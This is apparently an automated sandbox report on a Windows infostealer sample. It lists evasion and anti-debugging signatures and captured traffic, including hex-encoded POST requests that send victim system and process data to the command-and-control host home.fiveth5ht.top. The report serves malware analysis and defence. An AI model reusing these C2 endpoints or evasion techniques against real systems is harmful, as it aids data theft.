Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A3nofpjN9A.exe

Overview

General Information

Sample name:A3nofpjN9A.exe
renamed because original name is a hash value
Original sample name:2115e3fbda695f11af734c24ee699e6d.exe
Analysis ID:1581601
MD5:2115e3fbda695f11af734c24ee699e6d
SHA1:334ace427d9b4e6a95ea977e31c8060c3e3eb54c
SHA256:a782e6fb792b210e82802ac312542a670a37f4668031418875db91a4c9dfd5be
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • A3nofpjN9A.exe (PID: 5620 cmdline: "C:\Users\user\Desktop\A3nofpjN9A.exe" MD5: 2115E3FBDA695F11AF734C24EE699E6D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: A3nofpjN9A.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: A3nofpjN9A.exeReversingLabs: Detection: 60%
Source: A3nofpjN9A.exeVirustotal: Detection: 44%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: A3nofpjN9A.exeJoe Sandbox ML: detected
Source: A3nofpjN9A.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0043A5B0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0043A7F0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0043A7F0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0043A7F0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0043A7F0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0043A7F0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0043A7F0
Source: A3nofpjN9A.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003D255D
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003D29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 444274Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 35 35 30 38 35 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 2
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 81.29.149.125 81.29.149.125
Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_0049A8C0 recvfrom,0_2_0049A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 444274Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 35 35 30 38 35 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 2
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: A3nofpjN9A.exe, 00000000.00000002.2204472447.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204245896.0000000001789000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: A3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000003.2169724733.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169437946.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204540533.0000000001800000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169602744.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170003230.00000000017FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=
Source: A3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: A3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204245896.0000000001789000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862u
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: A3nofpjN9A.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: A3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: A3nofpjN9A.exeStatic PE information: section name:
Source: A3nofpjN9A.exeStatic PE information: section name: .idata
Source: A3nofpjN9A.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_3_0180650F0_3_0180650F
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003E05B00_2_003E05B0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003E6FA00_2_003E6FA0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_0040F1000_2_0040F100
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_0049B1800_2_0049B180
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_0075E0500_2_0075E050
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_0075A0000_2_0075A000
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_004A00E00_2_004A00E0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_004362100_2_00436210
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_0049C3200_2_0049C320
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_007244100_2_00724410
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_004A04200_2_004A0420
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003DE6200_2_003DE620
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_0049C7700_2_0049C770
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_007367300_2_00736730
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_0043A7F00_2_0043A7F0
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_007547800_2_00754780
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: String function: 004150A0 appears 38 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: String function: 00414FD0 appears 77 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: String function: 003D75A0 appears 183 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: String function: 003D73F0 appears 45 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: String function: 00414F40 appears 118 times
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: String function: 00587220 appears 31 times
Source: A3nofpjN9A.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: A3nofpjN9A.exeStatic PE information: Section: jqefefdt ZLIB complexity 0.9944594236209335
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003D255D
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003D29FF
Source: C:\Users\user\Desktop\A3nofpjN9A.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\A3nofpjN9A.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: A3nofpjN9A.exeReversingLabs: Detection: 60%
Source: A3nofpjN9A.exeVirustotal: Detection: 44%
Source: A3nofpjN9A.exeString found in binary or memory: 0o/wCFueDP+e2sOP8Arwx/7ff4UvquNuv9nf8A4DLy/u67r1A9S3R/5P8A9ejzfdf8/jXkzfFzwZu+/rH/AIAdf/J7+Wfzpv8AwuTwYsnzzaxz/wBOH/3d7n8K0WGxT/5h/wDyWXl5ef4M29l5S/r5HrW4+p/OhpPwB7Dqfx//AFV5N/wufwT/AM9NY/8AAG1/+Tvr/non/C5PBvz8ax/4Ad//AAN+v6DGOuiwmIf/ADDy/wDAX/8AI/16lqlt/s6+9f
